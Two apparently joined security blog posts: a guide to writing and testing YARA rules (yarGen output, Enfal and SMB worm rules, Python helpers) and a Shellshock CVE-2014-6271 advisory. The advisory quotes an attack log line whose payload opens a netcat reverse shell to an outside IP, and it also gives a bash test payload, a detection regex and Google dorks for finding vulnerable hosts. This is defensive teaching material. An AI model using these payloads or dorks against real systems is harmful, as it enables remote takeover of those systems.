To accomplish this task, I developed “yarGen”, a Yara rule generator that ships with a huge string database of common and benign software. To generate the database, I used the Windows system folder files of Windows 2003, Windows 7 and Windows 2008 R2 Server, typical software like Microsoft Office, 7zip, Firefox, Chrome and Cygwin, and the program folders of various Antivirus solutions. yarGen allows you to generate your own database or add folders with more goodware to the existing database.
yarGen extracts all ASCII and UNICODE strings from a sample and removes all strings that also appear in the goodware string database. Then it scores every string using fuzzy regular expressions and the “Gibberish Detector”, which allows yarGen to detect and prefer real language over meaningless character chains. The top 20 strings are integrated into the resulting rule.
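The following Python sketch illustrates only the shape of that pipeline: drop every string that also occurs in the goodware set, rank the rest, and keep the top N. The scoring function is a crude placeholder made up for this example. It is not yarGen's fuzzy regular expressions or Gibberish Detector, and the goodware set is hypothetical.

```python
import re


def score_string(candidate):
    """Crude placeholder score (NOT yarGen's algorithm): favour readable, telling strings."""
    score = 0
    if re.search(r"\.(exe|dll|bat|tmp|dat)\b", candidate, re.IGNORECASE):
        score += 3  # file names are often characteristic
    if re.search(r"%[sd]", candidate):
        score += 1  # format strings
    if re.search(r"[A-Za-z]{4,}", candidate):
        score += 2  # contains a word-like run of letters
    else:
        score -= 2  # probably random bytes that happen to be printable
    return score


def select_strings(sample_strings, goodware_strings, top_n=20):
    """Drop strings known from goodware, rank the rest, keep the top_n."""
    candidates = set(sample_strings) - set(goodware_strings)
    # Sort by descending score, then alphabetically for a stable result
    return sorted(candidates, key=lambda s: (-score_string(s), s))[:top_n]


sample = [
    "NT LM 0.12",
    "%s\\Admin$\\%s.exe",
    "LoadLibrary( NTDLL.DLL ) Error:%d",
    "tEHt;HuD",
    "RtlUpcaseUnicodeStringToOemString",
]
goodware = {"NT LM 0.12", "RtlUpcaseUnicodeStringToOemString"}  # hypothetical goodware hits
print(select_strings(sample, goodware, top_n=2))
```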
Let’s look at two examples from my work: a sample of the Enfal Trojan and an SMB worm sample.
yarGen generates the following rule for the Enfal Trojan sample:

rule Enfal_Generic {
    meta:
        description = "Auto-generated rule - from 3 different files"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2015/02/15"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
    strings:
        $s0 = "urlmon" fullword
        $s1 = "Registered trademarks and service marks are the property of their respec" wide
        $s2 = "Micorsoft Corportation" fullword wide
        $s3 = "IM Monnitor Service" fullword wide
        $s4 = "imemonsvc.dll" fullword wide
        $s5 = "iphlpsvc.tmp" fullword
        $s6 = "XpsUnregisterServer" fullword
        $s7 = "XpsRegisterServer" fullword
        $s8 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
        $s9 = "tEHt;HuD" fullword
        $s10 = "6.0.4.1624" fullword wide
        $s11 = "#*8;->)" fullword
        $s12 = "%/>#?#*8" fullword
        $s13 = "\\%04x%04x\\" fullword
        $s14 = "\n3,8,18" fullword
        $s15 = "\n3,4,15" fullword
        $s16 = "\n3,7,12" fullword
        $s17 = "\n3,4,13" fullword
        $s18 = "\n3,8,12" fullword
        $s19 = "\n3,8,15" fullword
        $s20 = "\n3,6,12" fullword
    condition:
        all of them
}

The resulting string set contains many useful strings but also random ASCII characters ($s9, $s11, $s12) that do match on the given sample but are less likely to produce the same result on other samples of the family.
yarGen generates the following rule for the SMB Worm sample:

rule sig_smb {
    meta:
        description = "Auto-generated rule - file smb.exe"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2015/02/15"
        hash = "db6cae5734e433b195d8fc3252cbe58469e42bf3"
    strings:
        $s0 = "LoadLibrary( NTDLL.DLL ) Error:%d" fullword ascii
        $s1 = "SetServiceStatus failed, error code = %d" fullword ascii
        $s2 = "%s\\Admin$\\%s.exe" fullword ascii
        $s3 = "%s.exe %s" fullword ascii
        $s4 = "iloveyou" fullword ascii
        $s5 = "Microsoft@ Windows@ Operating System" fullword wide
        $s6 = "\\svchost.exe" fullword ascii
        $s7 = "secret" fullword ascii
        $s8 = "SVCH0ST.EXE" fullword wide
        $s9 = "msvcrt.bat" fullword ascii
        $s10 = "Hello123" fullword ascii
        $s11 = "princess" fullword ascii
        $s12 = "Password123" fullword ascii
        $s13 = "Password1" fullword ascii
        $s14 = "config.dat" fullword ascii
        $s15 = "sunshine" fullword ascii
        $s16 = "password <=14" fullword ascii
        $s17 = "del /a %1" fullword ascii
        $s18 = "del /a %0" fullword ascii
        $s19 = "result.dat" fullword ascii
        $s20 = "training" fullword ascii
    condition:
        all of them
}

The resulting rules are good enough to use as they are, but they are far from optimal. However, it is good that so many strings have been found that do not appear in the analyzed goodware samples.
If you don’t want to use or download yarGen, you could also use the online tool Yara Rule Generator provided by Joe Security, which was inspired by/based on yarGen.
It is not necessary to use a generator if your eye is trained and experienced. In this case just read the next section and select the strings to match the requirements of the (what I call) sufficiently generic Yara rules.

Sufficiently Generic Yara Rules

As I said in the introduction, rules that generate false positives are pretty annoying. However, the real tragedy is that most rules are far too specific to match more than one sample and are therefore hardly more useful than a file hash.
What I tend to do is check all the strings and sort them into at least 2 different categories:

  • Very specific strings = hard indicators for a malicious sample
  • Rare strings = likely that they do not appear in goodware samples, but possible
  • Strings that look common = (Optional) e.g. yarGen output strings that do not seem to be specific but didn’t appear in the goodware string database

Look at the modified rule below to understand this split. Ignore the definition named $mz for now (I’ll explain it later) and focus on the string definitions.
The definitions starting with $s contain the very specific strings, which I regard as so special that they would not appear in legitimate software. Note the typos in both strings: “Micorsoft Corportation” instead of “Microsoft Corporation” and “Monnitor” instead of “Monitor”.
The strings starting with $x seem to be special (I tend to google the strings), but I cannot say whether they also appear in legitimate software. The definitions starting with $z look ordinary, but they were not part of the goodware string database, so they must be special in some way.

rule Enfal_Malware_Backdoor {
meta:
description = "Generic Rule to detect the Enfal Malware"
author = "Florian Roth"
date = "2015/02/10"
super_rule = 1
hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
strings:
$mz = { 4d 5a }
$s1 = "Micorsoft Corportation" fullword wide
$s2 = "IM Monnitor Service" fullword wide
$x1 = "imemonsvc.dll" fullword wide
$x2 = "iphlpsvc.tmp" fullword
$x3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
$z1 = "urlmon" fullword
$z2 = "Registered trademarks and service marks are the property of their" wide
$z3 = "XpsUnregisterServer" fullword
$z4 = "XpsRegisterServer" fullword
condition:
( $mz at 0 ) and
(
( 1 of ($s*) ) or
( 2 of ($x*) and all of ($z*) )
)
and filesize < 40000
}

Now look at the condition and notice that I combine the strings with the magic header of an executable (defined by $mz) and a file size limit. This excludes typical false positives such as antivirus signature files, browser caches or dictionary files. Set a generous file size limit to avoid false negatives (e.g. for samples between 100K and 200K, set filesize < 300K).
You can see that I decided that a single occurrence of one of the very specific strings triggers the rule ( 1 of ($s*) ).
Then I combine a number of less unique strings with most or all of the ordinary-looking strings ( 2 of ($x*) and all of ($z*) ).
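To make the condition logic concrete, here is a simplified Python emulation of the Enfal rule’s condition. It is a sketch, not a replacement for YARA: it assumes plain substring search, does not emulate the “fullword” boundary check, and approximates the “wide” modifier as UTF-16LE encoding. The helper names are hypothetical.

```python
# Simplified, hypothetical emulation of the Enfal_Malware_Backdoor condition.
# Assumptions: plain substring search; YARA's "fullword" check is NOT
# emulated, and the "wide" modifier is approximated as UTF-16LE encoding.


def ascii_str(text: str) -> bytes:
    """Plain string (YARA's default ascii encoding)."""
    return text.encode("ascii")


def wide_str(text: str) -> bytes:
    """'wide' string: each ASCII character followed by a zero byte."""
    return text.encode("utf-16-le")


S_STRINGS = [wide_str("Micorsoft Corportation"), wide_str("IM Monnitor Service")]
X_STRINGS = [wide_str("imemonsvc.dll"), ascii_str("iphlpsvc.tmp"),
             ascii_str("{53A4988C-F91F-4054-9076-220AC5EC03F3}")]
Z_STRINGS = [ascii_str("urlmon"),
             wide_str("Registered trademarks and service marks are the property of their"),
             ascii_str("XpsUnregisterServer"), ascii_str("XpsRegisterServer")]


def hits(data: bytes, patterns: list) -> int:
    """Number of distinct patterns found anywhere in data."""
    return sum(1 for p in patterns if p in data)


def enfal_condition(data: bytes, max_size: int = 40000) -> bool:
    if not data.startswith(b"MZ"):   # $mz at 0  ({ 4d 5a } == b"MZ")
        return False
    if len(data) >= max_size:        # filesize < 40000
        return False
    # ( 1 of ($s*) ) or ( 2 of ($x*) and all of ($z*) )
    return hits(data, S_STRINGS) >= 1 or (
        hits(data, X_STRINGS) >= 2 and hits(data, Z_STRINGS) == len(Z_STRINGS)
    )
```

For example, `enfal_condition(b"MZ" + b"\x00" * 64 + wide_str("IM Monnitor Service"))` is true because a single very specific string suffices, while the same bytes without the leading “MZ” do not match.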
Let’s look at a second example below.
$s1 is a very special string with string formatting placeholders “%s” in combination with an Admin$ share. $s2 seems to be the typical “svchost.exe” but contains the number “0” instead of an “O”, which is very uncommon and a clear indicator for something malicious.
All the definitions starting with $a are special but I cannot say for sure if they won’t appear in legitimate software. The strings defined by $x seem ordinary but were produced by yarGen, which means that they did not appear in the goodware string database.
This example also contains a list of typical passwords, defined by $z1..$z8.

rule SMB_Worm_Tool_Generic {
meta:
description = "Generic SMB Worm/Malware Signature"
author = "Florian Roth"
reference = "http://goo.gl/N3zx1m"
date = "2015/02/08"
hash = "db6cae5734e433b195d8fc3252cbe58469e42bf3"
strings:
$mz = { 4d 5a }
$s1 = "%s\\Admin$\\%s.exe" fullword ascii
$s2 = "SVCH0ST.EXE" fullword wide
$a1 = "LoadLibrary( NTDLL.DLL ) Error:%d" fullword ascii
$a2 = "\\svchost.exe" fullword ascii
$a3 = "msvcrt.bat" fullword ascii
$a4 = "Microsoft@ Windows@ Operating System" fullword wide
$x1 = "%s.exe %s" fullword ascii
$x2 = "password <=14" fullword ascii
$x3 = "del /a %1" fullword ascii
$x4 = "del /a %0" fullword ascii
$x5 = "SetServiceStatus failed, error code = %d" fullword ascii
$z1 = "secret" fullword ascii
$z2 = "Hello123" fullword ascii
$z3 = "princess" fullword ascii
$z4 = "Password123" fullword ascii
$z5 = "Password1" fullword ascii
$z6 = "sunshine" fullword ascii
$z7 = "training" fullword ascii
$z8 = "iloveyou" fullword ascii
condition:
$mz at 0 and
(
( 1 of ($s*) and 1 of ($x*) ) or
( all of ($a*) and 2 of ($x*) ) or
( 5 of ($z*) and 2 of ($x*) )
) and
filesize < 200000
}

You see that I combined the string definitions in a similar way as before. This method in combination with the magic header and the file size should be a good starting point for the final stage – testing.
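The categorization can also be turned into rule text mechanically. The following Python sketch uses hypothetical helpers (`build_rule` and `yara_string` are illustrative names, not part of yarGen) and assumes every string gets the “fullword” modifier, which the hand-written rules above do not always use. It wraps all alternatives in one pair of parentheses because YARA evaluates `and` before `or`: without them, `$mz at 0 and A or B` is read as `($mz at 0 and A) or B`, so B could match files that lack the MZ header or exceed the size limit.

```python
# Hypothetical helper (not part of yarGen): turn categorized strings into a
# rule skeleton that follows the Enfal-style condition shown above.
# Assumption: every string gets the "fullword" modifier.


def yara_string(ident: str, text: str, wide: bool) -> str:
    """Format one YARA text string, escaping backslashes and double quotes."""
    escaped = text.replace("\\", "\\\\").replace('"', '\\"')
    modifier = "wide" if wide else "ascii"
    return f'${ident} = "{escaped}" fullword {modifier}'


def build_rule(name, specific, rare, common, max_size):
    """specific/rare/common are lists of (text, is_wide) tuples."""
    if not (specific and rare and common):
        raise ValueError("each category needs at least one string")
    lines = ["rule " + name + " {", "strings:", "$mz = { 4d 5a }"]
    for prefix, group in (("s", specific), ("x", rare), ("z", common)):
        for number, (text, wide) in enumerate(group, start=1):
            lines.append(yara_string(f"{prefix}{number}", text, wide))
    lines += [
        "condition:",
        "$mz at 0 and",
        "(",  # one group around all alternatives, since "and" binds tighter
        "( 1 of ($s*) ) or",
        f"( {min(2, len(rare))} of ($x*) and all of ($z*) )",
        ")",
        f"and filesize < {max_size}",
        "}",
    ]
    return "\n".join(lines)
```

For instance, passing `[("%s\\Admin$\\%s.exe", False), ("SVCH0ST.EXE", True)]` as the specific strings yields `$s1 = "%s\\Admin$\\%s.exe" fullword ascii` and `$s2 = "SVCH0ST.EXE" fullword wide`. The output is a starting point to review by hand, not a finished rule.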

Testing

Testing the rules is very important. Many authors seem to consider their rules good enough as soon as they match the given samples.
You should definitely do the following checks:

  1. Scan the malware samples
  2. Scan a big goodware archive

To carry out the tests, download the Yara scanner and run it from the command line. The goodware directory should include system files from various Windows versions, typical software and possible false positive sources (e.g. typical CMS software if you wrote Yara rules that match malicious web shells).
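Both checks can be scripted. The following Python sketch assumes the `yara` command-line scanner is on the PATH and prints its default output of one “rule file” pair per line; `evaluate`, `scan` and `parse_yara_output` are hypothetical helper names, and the rule file and directory names you pass in are placeholders.

```python
import os
import subprocess
from pathlib import Path


def parse_yara_output(output: str) -> dict:
    """Map each matched file to the set of rules that matched it.

    Assumes the yara CLI's default output: one "<rule> <file>" pair per line
    (no -g/-m/-s flags). Rule names cannot contain spaces, so everything after
    the first space is the file path.
    """
    hits = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        rule, _, path = line.partition(" ")
        hits.setdefault(os.path.normpath(path), set()).add(rule)
    return hits


def scan(rule_file: str, target_dir: str) -> dict:
    """Run 'yara -r <rule_file> <target_dir>' (recursive scan) and parse it."""
    result = subprocess.run(["yara", "-r", rule_file, target_dir],
                            capture_output=True, text=True, check=False)
    # Errors reported on stderr are not handled in this sketch.
    return parse_yara_output(result.stdout)


def evaluate(rule_file: str, malware_dir: str, goodware_dir: str):
    """Return (missed malware samples, goodware false positives)."""
    detected = scan(rule_file, malware_dir)
    samples = [os.path.normpath(str(p)) for p in Path(malware_dir).rglob("*")
               if p.is_file()]
    missed = [s for s in samples if s not in detected]
    false_positives = scan(rule_file, goodware_dir)
    return missed, false_positives
```

A call such as `missed, false_positives = evaluate("rules.yar", "malware", "goodware")` should ideally return an empty list and an empty dictionary.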

[Figure: Yara Rule Testing on Samples and Goodware]


If the rule matches the malicious samples and produces no matches on the goodware archive, it is good enough to be tested in practice.

Update

Make sure to check Part 2 of “How to Write Simple and Sound YARA Rules”.

Detecting the Bash Vulnerability CVE-2014-6271 “Shell Shock”

Shell Shock logo (image: Paul M. Gerhardt)


This article contains information on how to detect and handle the bash vulnerability CVE-2014-6271 “Shell Shock”.

Affected Systems

In principle, every system that uses “bash” is affected, i.e.

  • Linux
  • Unix
  • AIX
  • Solaris
  • HP-UX
  • and therefore also many embedded systems, network devices and appliances

Remote exploitation, however, requires a remotely reachable service that makes use of bash in a particular way. In our view, the focus is especially on systems that offer a simple web application or a web application that executes system-level commands.
Examples:

  • Print servers
  • Video cameras
  • Building automation
  • Display systems
  • iLO boards
  • ICS and SCADA systems
  • Appliances (proprietary, with a web interface and restricted remote access)
  • Etc.

The same applies to any simple web application that uses “popen()” or “system()” calls, because these calls run commands through /bin/sh, which is bash on many Linux systems. Active scripts written in Perl or other rather susceptible languages are also frequently found in “cgi-bin” folders; CGI passes HTTP request headers to such scripts as environment variables, which is exactly where the malicious code gets injected.
Large web frameworks such as CMS systems, J2EE or WebSphere are most likely not vulnerable.

Criticality

Even though the attack vectors are diverse and there is no simple way to identify vulnerable applications, the damage potential is considerable. This assessment is based on the fact that once a vulnerable application is found, the corresponding exploit is extremely simple to use: a simple URL request or a “curl” command line may be all that is needed to exploit the vulnerability.
Unlike Heartbleed, which allowed attackers to read memory contents, this vulnerability lets the attacker execute code directly as the user of the vulnerable service, which in the worst case means an immediate takeover of the whole system. This is another reason why the damage potential is enormous. It also enables the development of worms that specifically exploit the already known vulnerabilities of various products and then spread through these devices.
The great difficulty then lies in removing such “novel” worms efficiently and in a coordinated way, because appliances, building automation and other embedded devices already posed major challenges for security organizations during earlier worm outbreaks in Windows environments.
Vector: Diverse
Damage: High
Complexity: Low
Remotely exploitable: Yes (if a remotely offered service uses bash functionality)

Detection

The problem with this vulnerability is that there can be no clear check or indicator at the system level, because the vulnerability is not limited to a single vulnerable script or product. Exploitation via the DHCP protocol has even been demonstrated in a proof of concept (POC).
Vulnerable scripts and applications could be hidden in all kinds of products.

Network Level

At present, the only sensible solution is detection in network traffic by IDS/IPS systems, which use signatures to recognize malicious requests in the HTTP data stream or in other protocols and, when operated “inline”, can block the connection directly if necessary.

System Level

Detection at the system level is difficult, because the malicious code is injected into the environment variables of the user account under which the exploited service runs. The code therefore exists only in the system’s memory.
The system diagnostics tool “sysdig” already includes a solution, but it is only suitable for monitoring individual systems and requires considerable additional work to feed the output generated by sysdig into a central security monitoring system.
If Apache access logs are collected in a security monitoring system (SIEM), it is worth monitoring these log files. The log lines of an attack and of the currently known worms look like this (in this listing, the injection is done via the User-Agent string, which of course has to be part of the defined log format):

213.5.67.223 - - [26/Sep/2014:10:37:34 +0200] "GET /cgi-bin/poc.cgi HTTP/1.1" 200 1066 "-" "() { :; }; /bin/nc -e /bin/sh 213.5.67.223 4444 &"

Searching the access logs for the following regex can reveal malicious requests:

\(\)\s\{.*;\s*\};
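For log files that are not (yet) in a SIEM, the regex can be applied with a few lines of Python. This is a sketch; `find_shellshock_lines` is a hypothetical helper and the log file name in the usage note is a placeholder. Note that the pattern requires exactly one whitespace character between “()” and “{”, so a payload written as “(){ :;};” would slip through; relaxing `\s` to `\s*` at that position is one possible adjustment.

```python
import re

# Regex from the text above, unchanged.
SHELLSHOCK_RE = re.compile(r"\(\)\s\{.*;\s*\};")


def find_shellshock_lines(lines):
    """Yield (line number, line) for every access log line matching the regex."""
    for number, line in enumerate(lines, start=1):
        if SHELLSHOCK_RE.search(line):
            yield number, line.rstrip("\n")
```

Usage, e.g.: `with open("access.log", encoding="utf-8", errors="replace") as f:` followed by `for number, line in find_shellshock_lines(f): print(number, line)`.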

Checking for Vulnerability

To test whether a system’s bash would be vulnerable at all if an attacker were able to inject code from outside, the following command can be used:

env x='() { :;}; echo vulnerable' bash -c 'echo hello'

If bash is vulnerable, the output contains “vulnerable” before “hello”. A patched bash prints only “hello”, possibly preceded by an error or warning about the ignored function definition.
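The same check can be scripted, for example to run it on many hosts through an existing management tool. This Python sketch uses a hypothetical helper, `bash_is_vulnerable`, which sets the variable x exactly as the env command above does and looks for a “vulnerable” line on bash’s standard output.

```python
import os
import shutil
import subprocess


def bash_is_vulnerable(bash: str = "bash"):
    """Return True/False for the CVE-2014-6271 test, None if bash is missing."""
    bash_path = shutil.which(bash)
    if bash_path is None:
        return None
    env = dict(os.environ)
    # Same payload as: env x='() { :;}; echo vulnerable' bash -c 'echo hello'
    env["x"] = "() { :;}; echo vulnerable"
    result = subprocess.run([bash_path, "-c", "echo hello"], env=env,
                            capture_output=True, text=True, timeout=10)
    # A vulnerable bash runs the trailing command while importing the function
    # definition, so a line "vulnerable" appears on stdout before "hello".
    return "vulnerable" in result.stdout.splitlines()


if __name__ == "__main__":
    print(bash_is_vulnerable())
```

Warnings printed by a patched bash go to standard error and are ignored here; only the standard output decides the result.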

Protection Options

Patching

Various Linux distribution vendors already provide patches. Because many of the patches released immediately were ineffective, a new identifier, CVE-2014-7169, was opened to track bash versions that were patched but still vulnerable. Keep an eye on this CVE number as well.

Blocking via IPS / WAF

As described above, we currently regard IDS/IPS systems and WAFs (Web Application Firewalls) as the only available protection.
Signatures are available both for the open-source solutions Snort and Bro and for commercial IDS systems; on an “inline” installation they can be set to “blocking”. The current attacks against web servers are clearly visible in network traffic and are easy to describe with regular expressions or to define in signatures.

Google Dorks

These Google searches can help find potentially vulnerable target systems.

inurl:cgi-bin "GATEWAY_INTERFACE = CGI"
inurl:"server-status" intitle:apache "cgi-bin"
sitemap.xml filetype:xml intext:"cgi-bin"
filetype:sh inurl:cgi-bin

Further Information

Information from Rapid7 (Metasploit)
Shell Shock report on Heise
Examples of exploiting the vulnerability

Staying Up to Date

Heise Security reports extensively on the “Shell Shock” vulnerability.
http://www.heise.de/security/suche/?q=ShellShock&rm=search
We also recommend following the Twitter search stream for “CVE-2014-6271”.
https://twitter.com/search?q=CVE-2014-6271